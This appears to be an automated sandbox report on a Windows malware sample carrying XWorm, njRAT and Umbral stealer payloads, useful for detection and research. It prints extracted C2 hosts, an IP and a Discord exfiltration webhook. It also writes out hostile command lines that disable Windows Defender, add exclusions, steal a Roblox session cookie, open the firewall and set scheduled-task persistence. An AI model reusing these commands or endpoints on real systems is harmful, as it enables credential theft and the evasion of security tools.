Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
11-07-2024 01:30
Static task
static1
Behavioral task
behavioral1
Sample
64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe
Resource
win7-20240705-en
General
-
Target
64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe
-
Size
7.7MB
-
MD5
6ca08efccb785d2b8c23c54a05930356
-
SHA1
c4de56535545a5a6555af998b2b3fbb254637625
-
SHA256
64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed
-
SHA512
8da14f29989d5c99b0335be45951e4e87dccabefccae73a8e5cf13d91e6d47fcf1408b9020a965015b15175239f6d732d8cd4b6b11e07b232386827984b77b14
-
SSDEEP
196608:p9xmKlBELQL73HTSddEVnvbG3eVvMJxOf2X6QDpTrTMA:Yf03QdEc3eJMJxOf25VT3D
Malware Config
Extracted
xworm
5.0
testarosa.duckdns.org:7110
5ZpeoOe6AtQfr6wU
-
Install_directory
%AppData%
-
install_file
Ondrive.exe
Extracted
njrat
0.7d
HacKed
147.185.221.20:49236
6a8a3b6e5450a823d542e748a454aa4c
-
reg_key
6a8a3b6e5450a823d542e748a454aa4c
-
splitter
|'|'|
Extracted
umbral
https://discord.com/api/webhooks/1255561908631900262/FBfFOJC5RNZ6gSVwbGsinrWT1Tk0AcX2fxXrs9EMYvCvgKrDx5R4TOUhy9LGN7mz_JKs
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000015cc3-34.dat family_umbral behavioral1/memory/2032-37-0x0000000000DE0000-0x0000000000E20000-memory.dmp family_umbral -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0008000000015bd7-22.dat family_xworm behavioral1/memory/2516-28-0x0000000000A90000-0x0000000000AA0000-memory.dmp family_xworm behavioral1/memory/1972-117-0x0000000000FB0000-0x0000000000FC0000-memory.dmp family_xworm behavioral1/memory/2076-119-0x0000000001370000-0x0000000001380000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2780 powershell.exe 856 powershell.exe 2096 powershell.exe 1320 powershell.exe 2012 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1484 netsh.exe -
Executes dropped EXE 10 IoCs
pid Process 2704 Server.exe 2748 3.exe 2516 conhost.exe 2608 Server.exe 2032 3.exe 2980 conhost.exe 2192 msxml6.EXE 1688 server.exe 1972 Ondrive.exe 2076 Ondrive.exe -
Loads dropped DLL 3 IoCs
pid Process 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 2808 Process not Found 2608 Server.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2344 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2592 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3000 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2516 conhost.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2032 3.exe 2780 powershell.exe 856 powershell.exe 2348 powershell.exe 2096 powershell.exe 1320 powershell.exe 2064 powershell.exe 2012 powershell.exe 2276 powershell.exe 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe Token: SeDebugPrivilege 2516 conhost.exe Token: SeDebugPrivilege 2980 conhost.exe Token: SeDebugPrivilege 2032 3.exe Token: SeIncreaseQuotaPrivilege 1296 wmic.exe Token: SeSecurityPrivilege 1296 wmic.exe Token: SeTakeOwnershipPrivilege 1296 wmic.exe Token: SeLoadDriverPrivilege 1296 wmic.exe Token: SeSystemProfilePrivilege 1296 wmic.exe Token: SeSystemtimePrivilege 1296 wmic.exe Token: SeProfSingleProcessPrivilege 1296 wmic.exe Token: SeIncBasePriorityPrivilege 1296 wmic.exe Token: SeCreatePagefilePrivilege 1296 wmic.exe Token: SeBackupPrivilege 1296 wmic.exe Token: SeRestorePrivilege 1296 wmic.exe Token: SeShutdownPrivilege 1296 wmic.exe Token: SeDebugPrivilege 1296 wmic.exe Token: SeSystemEnvironmentPrivilege 1296 wmic.exe Token: SeRemoteShutdownPrivilege 1296 wmic.exe Token: SeUndockPrivilege 1296 wmic.exe Token: SeManageVolumePrivilege 1296 wmic.exe Token: 33 1296 wmic.exe Token: 34 1296 wmic.exe Token: 35 1296 wmic.exe Token: SeIncreaseQuotaPrivilege 1296 wmic.exe Token: SeSecurityPrivilege 1296 wmic.exe Token: SeTakeOwnershipPrivilege 1296 wmic.exe Token: SeLoadDriverPrivilege 1296 wmic.exe Token: SeSystemProfilePrivilege 1296 wmic.exe Token: SeSystemtimePrivilege 1296 wmic.exe Token: SeProfSingleProcessPrivilege 1296 wmic.exe Token: SeIncBasePriorityPrivilege 1296 wmic.exe Token: SeCreatePagefilePrivilege 1296 wmic.exe Token: SeBackupPrivilege 1296 wmic.exe Token: SeRestorePrivilege 1296 wmic.exe Token: SeShutdownPrivilege 1296 wmic.exe Token: SeDebugPrivilege 1296 wmic.exe Token: SeSystemEnvironmentPrivilege 1296 wmic.exe Token: SeRemoteShutdownPrivilege 1296 wmic.exe Token: SeUndockPrivilege 1296 wmic.exe Token: SeManageVolumePrivilege 1296 wmic.exe Token: 33 1296 wmic.exe Token: 34 1296 wmic.exe Token: 35 1296 wmic.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeIncreaseQuotaPrivilege 1232 wmic.exe Token: SeSecurityPrivilege 1232 wmic.exe Token: SeTakeOwnershipPrivilege 1232 wmic.exe Token: SeLoadDriverPrivilege 1232 wmic.exe Token: SeSystemProfilePrivilege 1232 wmic.exe Token: SeSystemtimePrivilege 1232 wmic.exe Token: SeProfSingleProcessPrivilege 1232 wmic.exe Token: SeIncBasePriorityPrivilege 1232 wmic.exe Token: SeCreatePagefilePrivilege 1232 wmic.exe Token: SeBackupPrivilege 1232 wmic.exe Token: SeRestorePrivilege 1232 wmic.exe Token: SeShutdownPrivilege 1232 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1304 wrote to memory of 2704 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 31 PID 1304 wrote to memory of 2704 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 31 PID 1304 wrote to memory of 2704 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 31 PID 1304 wrote to memory of 2748 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 32 PID 1304 wrote to memory of 2748 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 32 PID 1304 wrote to memory of 2748 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 32 PID 2704 wrote to memory of 2608 2704 Server.exe 33 PID 2704 wrote to memory of 2608 2704 Server.exe 33 PID 2704 wrote to memory of 2608 2704 Server.exe 33 PID 2704 wrote to memory of 2608 2704 Server.exe 33 PID 2704 wrote to memory of 2516 2704 Server.exe 34 PID 2704 wrote to memory of 2516 2704 Server.exe 34 PID 2704 wrote to memory of 2516 2704 Server.exe 34 PID 2748 wrote to memory of 2032 2748 3.exe 35 PID 2748 wrote to memory of 2032 2748 3.exe 35 PID 2748 wrote to memory of 2032 2748 3.exe 35 PID 2748 wrote to memory of 2980 2748 3.exe 36 PID 2748 wrote to memory of 2980 2748 3.exe 36 PID 2748 wrote to memory of 2980 2748 3.exe 36 PID 1304 wrote to memory of 2192 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 37 PID 1304 wrote to memory of 2192 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 37 PID 1304 wrote to memory of 2192 1304 64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe 37 PID 2032 wrote to memory of 1296 2032 3.exe 39 PID 2032 wrote to memory of 1296 2032 3.exe 39 PID 2032 wrote to memory of 1296 2032 3.exe 39 PID 2032 wrote to memory of 2560 2032 3.exe 41 PID 2032 wrote to memory of 2560 2032 3.exe 41 PID 2032 wrote to memory of 2560 2032 3.exe 41 PID 2032 wrote to memory of 2780 2032 3.exe 43 PID 2032 wrote to memory of 2780 2032 3.exe 43 PID 2032 wrote to memory of 2780 2032 3.exe 43 PID 2516 wrote to memory of 856 2516 conhost.exe 45 PID 2516 wrote to memory of 856 2516 conhost.exe 45 PID 2516 wrote to memory of 856 2516 conhost.exe 45 PID 2032 wrote to memory of 2348 2032 3.exe 47 PID 2032 wrote to memory of 2348 2032 3.exe 47 PID 2032 wrote to memory of 2348 2032 3.exe 47 PID 2516 wrote to memory of 2096 2516 conhost.exe 49 PID 2516 wrote to memory of 2096 2516 conhost.exe 49 PID 2516 wrote to memory of 2096 2516 conhost.exe 49 PID 2516 wrote to memory of 1320 2516 conhost.exe 51 PID 2516 wrote to memory of 1320 2516 conhost.exe 51 PID 2516 wrote to memory of 1320 2516 conhost.exe 51 PID 2032 wrote to memory of 2064 2032 3.exe 53 PID 2032 wrote to memory of 2064 2032 3.exe 53 PID 2032 wrote to memory of 2064 2032 3.exe 53 PID 2516 wrote to memory of 2012 2516 conhost.exe 55 PID 2516 wrote to memory of 2012 2516 conhost.exe 55 PID 2516 wrote to memory of 2012 2516 conhost.exe 55 PID 2032 wrote to memory of 2276 2032 3.exe 57 PID 2032 wrote to memory of 2276 2032 3.exe 57 PID 2032 wrote to memory of 2276 2032 3.exe 57 PID 2032 wrote to memory of 1232 2032 3.exe 59 PID 2032 wrote to memory of 1232 2032 3.exe 59 PID 2032 wrote to memory of 1232 2032 3.exe 59 PID 2032 wrote to memory of 1784 2032 3.exe 61 PID 2032 wrote to memory of 1784 2032 3.exe 61 PID 2032 wrote to memory of 1784 2032 3.exe 61 PID 2516 wrote to memory of 3000 2516 conhost.exe 63 PID 2516 wrote to memory of 3000 2516 conhost.exe 63 PID 2516 wrote to memory of 3000 2516 conhost.exe 63 PID 2032 wrote to memory of 2336 2032 3.exe 65 PID 2032 wrote to memory of 2336 2032 3.exe 65 PID 2032 wrote to memory of 2336 2032 3.exe 65 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2560 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1688 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1484
-
-
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Roaming\3.exe"C:\Users\Admin\AppData\Roaming\3.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\3.exe"4⤵
- Views/modifies file attributes
PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:1784
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2344
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\3.exe" && pause4⤵PID:2880
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:2592
-
-
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\msxml6.EXE"C:\Users\Admin\AppData\Local\Temp\msxml6.EXE"2⤵
- Executes dropped EXE
PID:2192
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {49E8EAF4-3AD2-4F8D-8D26-988F1C0ACCE3} S-1-5-21-2172136094-3310281978-782691160-1000:EXCFTDUU\Admin:Interactive:[1]1⤵PID:1756
-
C:\Users\Admin\AppData\Roaming\Ondrive.exeC:\Users\Admin\AppData\Roaming\Ondrive.exe2⤵
- Executes dropped EXE
PID:1972
-
-
C:\Users\Admin\AppData\Roaming\Ondrive.exeC:\Users\Admin\AppData\Roaming\Ondrive.exe2⤵
- Executes dropped EXE
PID:2076
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
274KB
MD5ed59c6590b199b2ee53eec444322472b
SHA16c91f4e2489a9869ab971061fdd67a0eeb1e7007
SHA256aa4abbb1305525b1703a23521db1e817dfd39f014527c319a16a153d2d9dcb0f
SHA5127dd903995d2c673a3778c5f4f5006cdf3e177ad9093649e5e953894e49f386049ae1e58103095874f09b91d4e21d963d05f02ea9644ed67dd3054aa10b47ba97
-
Filesize
71KB
MD5f9b08bd21b40a938122b479095b7c70c
SHA1eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee
-
Filesize
7.7MB
MD58b39a0c9d351c316ae38251db3e917da
SHA171c988393af62584e93ebe721a600c1a51fa7c29
SHA256aacbefe172556a5df9e5bf52834aaa22893002edeb46533e1a85866cc7462a15
SHA512092f06c5f373a65be4f4784357596422df1bb50dcd81c0056464c70f99a0845d71e6819f01c8e7a2ca3f663ad4125588b6e48d88ec0736e7305a70bd8c59e9af
-
Filesize
227KB
MD566d7e8125484efe9585adf807f3860ec
SHA1aad54a84cc6bfcd422631bfce7b187b001ec0128
SHA2569cc7b63b2a2c95cfdd1f0f9044f6f760d8dae0d622aa07cb18ce071d9c491d4e
SHA512f0eabf14bab037689568dc6f7bb6126d1c5922e08432b650e338567c7ae2d70d1ac3420dfec0501453a0e8fece11482071434137e70d62e1136dd482a791d5d5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58f8ca61a2c6c8eb36cfd7c9c7f0b0cc7
SHA1d2384af4a1999312a6fae09795565ce352c3cfd8
SHA2560feaf58bd0527908a5e8ae4fb5d4a85ba9f18dc188ccd662662ebb0daf8037fb
SHA512d04226a9fd10cd4b4e82ae2b79a274da423657ce0486f9ce9b55507ef65958094da756d993852692d1d0c6534159f56978b1ddf9b4f7690a84d6497541ead4fd
-
Filesize
23KB
MD532fe01ccb93b0233503d0aaaa451f7b2
SHA158e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA2566988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA51276945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6
-
Filesize
37KB
MD5b37dd1a1f0507baf993471ae1b7a314c
SHA19aff9d71492ffff8d51f8e8d67f5770755899882
SHA256e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460